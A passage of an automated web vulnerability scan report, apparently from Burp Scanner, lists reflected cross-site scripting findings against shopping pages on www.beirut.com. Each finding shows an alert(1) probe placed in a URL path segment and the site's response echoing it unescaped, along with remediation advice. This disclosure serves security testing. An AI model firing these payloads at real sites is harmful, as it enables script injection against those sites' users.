Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9918d'-alert(1)-'0cfdfdbe39d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories9918d'-alert(1)-'0cfdfdbe39d/194367784/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:06:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessories9918d'-alert(1)-'0cfdfdbe39d/194367784/Fragrance/39';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.806. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20a49'-alert(1)-'b4e23825a91 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/19436778420a49'-alert(1)-'b4e23825a91/Fragrance/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:14:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/19436778420a49'-alert(1)-'b4e23825a91/Fragrance/39';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.807. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a759e'-alert(1)-'9b9436bf688 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Fragrancea759e'-alert(1)-'9b9436bf688/39 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:20:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Fragrancea759e'-alert(1)-'9b9436bf688/39';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.808. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Fragrance/39 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Fragrance/39

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59ca'-alert(1)-'b95c66db0c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Fragrance/39d59ca'-alert(1)-'b95c66db0c2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:24:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Fragrance/39d59ca'-alert(1)-'b95c66db0c2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.809. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c871'-alert(1)-'d5d73661ea1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping5c871'-alert(1)-'d5d73661ea1/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:54:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping5c871'-alert(1)-'d5d73661ea1/Clothing-Accessories/194367784/Glasses-Eye-Wear/38';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.810. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfae5"><a>d4387b467f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingdfae5"><a>d4387b467f6/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:39:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingdfae5"><a>d4387b467f6">
...[SNIP]...

4.811. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b46c3<script>alert(1)</script>3a630b354c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessoriesb46c3<script>alert(1)</script>3a630b354c8/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:00:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessoriesb46c3<script>alert(1)</script>3a630b354c8 <a href="#" id="backlink">
...[SNIP]...

4.812. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a527'-alert(1)-'342e392d1d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories8a527'-alert(1)-'342e392d1d1/194367784/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:59:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories8a527'-alert(1)-'342e392d1d1/194367784/Glasses-Eye-Wear/38';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.813. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4814e'-alert(1)-'279d2584fa2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/1943677844814e'-alert(1)-'279d2584fa2/Glasses-Eye-Wear/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:08:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/1943677844814e'-alert(1)-'279d2584fa2/Glasses-Eye-Wear/38';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.814. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4693c'-alert(1)-'a88536994b6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear4693c'-alert(1)-'a88536994b6/38 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:13:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear4693c'-alert(1)-'a88536994b6/38';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.815. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/38

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51800'-alert(1)-'b0159144be0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/3851800'-alert(1)-'b0159144be0 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:18:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Glasses-Eye-Wear/3851800'-alert(1)-'b0159144be0';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.816. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2114"><a>e3500dc4ea8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppinge2114"><a>e3500dc4ea8/Clothing-Accessories/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:53:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppinge2114"><a>e3500dc4ea8">
...[SNIP]...

4.817. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e97f'-alert(1)-'9e3197d8b3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping8e97f'-alert(1)-'9e3197d8b3e/Clothing-Accessories/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:10:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
